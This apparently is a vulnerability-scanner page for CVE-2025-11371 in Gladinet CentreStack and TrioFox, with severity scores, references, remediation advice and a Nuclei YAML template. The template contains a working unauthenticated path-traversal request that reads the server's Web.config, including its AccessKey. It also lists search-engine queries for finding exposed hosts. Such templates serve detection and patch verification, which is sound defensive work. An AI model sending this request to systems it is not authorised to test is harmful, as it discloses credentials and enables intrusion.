Gladinet CentreStack & TrioFox - Local File Inclusion

CVE-2025-11371

Verified

Description

In the default installation and configuration of Gladinet CentreStack and TrioFox, there is an unauthenticated Local File Inclusion Flaw that allows unintended disclosure of system files. Exploitation of this vulnerability has been observed in the wild. This issue impacts Gladinet CentreStack and Triofox: All versions prior to and including 16.7.10368.56560

Severity

Medium

CVSS Score

6.2

Exploit Probability

29%

Published Date

October 16, 2025

Template Author

kazgangap

CVE-2025-11371.yaml

id: CVE-2025-11371

info:
  name: Gladinet CentreStack & TrioFox - Local File Inclusion
  author: Kazgangap
  severity: medium
  description: |
    In the default installation and configuration of Gladinet CentreStack and TrioFox, there is an unauthenticated Local File Inclusion Flaw that allows unintended disclosure of system files. Exploitation of this vulnerability has been observed in the wild.  This issue impacts Gladinet CentreStack and Triofox: All versions prior to and including 16.7.10368.56560
  impact: |
    Unauthenticated attackers can disclose sensitive system files, potentially leading to information leakage.
  remediation: |
    Update to a version later than 16.7.10368.56560 or the latest available version.
  reference:
    - https://www.huntress.com/blog/gladinet-centrestack-triofox-local-file-inclusion-flaw
    - https://github.com/Kazgangap/cve-poc-garage/blob/main/2025/CVE-2025-11371.md
    - https://thehackernews.com/2025/10/from-lfi-to-rce-active-exploitation.html
    - https://nvd.nist.gov/vuln/detail/CVE-2025-11371
  classification:
    cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 6.2
    cve-id: CVE-2025-11371
    cwe-id: CWE-552
    epss-score: 0.29324
    epss-percentile: 0.96371
  metadata:
    verified: true
    max-request: 1
    shodan-query: title:"CentreStack"
    fofa-query: "CentreStack - Login"
  tags: cve,cve2025,gladinet,lfi,centrestack,vkev,vuln,kev

http:
  - raw:
      - |
        GET /storage/t.dn?s=..%5C..%5C..%5CProgram+Files+(x86)%5CGladinet+Cloud+Enterprise%5Croot%5CWeb.config&sid=1 HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "<configuration>", "<system.web>", "AccessKey")'
          - 'contains(content_type, "application/octet-stream")'
          - 'status_code == 200'
        condition: and
# digest: 4a0a004730450220025bc1a8b27d49aac8bd75e3cb82f4ee89cddfc559c52fc82b1476aa5bae31ec022100ababadc6cb96b17664db027b80dda99a72bb36ba8a85f629ee8b36a125138c1d:922c64590222798bb761d5b6d8e72950

6.2Score

CVSS Metrics

CVSS Vector:

CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

CVE ID:

cve-2025-11371

CWE ID:

cwe-552

References

https://www.huntress.com/blog/gladinet-centrestack-triofox-local-file-inclusion-flaw https://github.com/Kazgangap/cve-poc-garage/blob/main/2025/CVE-2025-11371.md https://thehackernews.com/2025/10/from-lfi-to-rce-active-exploitation.html https://nvd.nist.gov/vuln/detail/CVE-2025-11371

Remediation Steps

Update to a version later than 16.7.10368.56560 or the latest available version.